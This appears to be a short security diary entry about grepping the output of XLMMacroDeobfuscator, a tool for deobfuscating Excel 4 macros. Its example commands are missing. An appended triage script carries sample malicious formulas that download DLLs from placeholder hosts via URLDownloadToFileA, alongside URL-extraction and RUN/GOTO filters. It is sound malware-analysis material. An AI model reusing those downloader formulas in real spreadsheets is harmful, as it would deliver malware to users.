XLMMacroDeobfuscator is an open-source tool to deobfuscate Excel 4 macros. I wrote diary entries about it here and here.

In my first diary entry, I remarked that I also had to install a missing Python module. This is no longer the case with the latest versions: I just install it with a single pip command.

The author also commented on my diary entry, suggesting the use of a couple of options to yield a cleaner output ready for grepping. Like this:

Indeed, this provides cleaner output when grepping for http URLs, for example:

And this output can also be used to extract the relevant macros, with inverted greps for RUN, GOTO, ..., like this:
Didier Stevens
ISC Handler, Jun 1st 2020
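The two grep steps described in the diary entry, as an added example that is not part of the original entry or of the tool. It runs over constructed sample formulas instead of invoking XLMMacroDeobfuscator; the function names and sample lines are assumptions, and only the RUN and GOTO filters named in the text are applied.

```shell
#!/usr/bin/env bash
# Added example: grep triage over cleaned, one-formula-per-line output.

# Constructed sample of deobfuscated Excel 4 macro formulas.
# These lines are made up for illustration; they are not real tool output.
sample_output() {
cat <<'EOF'
=GOTO(B5)
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://files.example.invalid/a.dll","C:\Users\Public\a.dll",0,0)
=RUN($C$12)
=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cdn.example.invalid/b.dll","C:\Users\Public\b.dll",0,0)
=GOTO(D1)
=HALT()
EOF
}

# Grep for http URLs: print only the matched URL, deduplicated.
# The character class stops at the closing quote, comma or parenthesis
# that follows a URL inside a formula argument list.
extract_urls() {
    grep -Eo "https?://[^\"' ),]+" | LC_ALL=C sort -u
}

# Inverted greps: drop the control-flow formulas (RUN, GOTO) so that only
# the formulas doing the actual work remain. More -e patterns can be added.
relevant_macros() {
    grep -vF -e '=RUN(' -e '=GOTO('
}

echo "URLs:"
sample_output | extract_urls
echo
echo "Relevant macros:"
sample_output | relevant_macros
```

Both functions read from standard input, so the tool's cleaned output can be piped into them in place of `sample_output`.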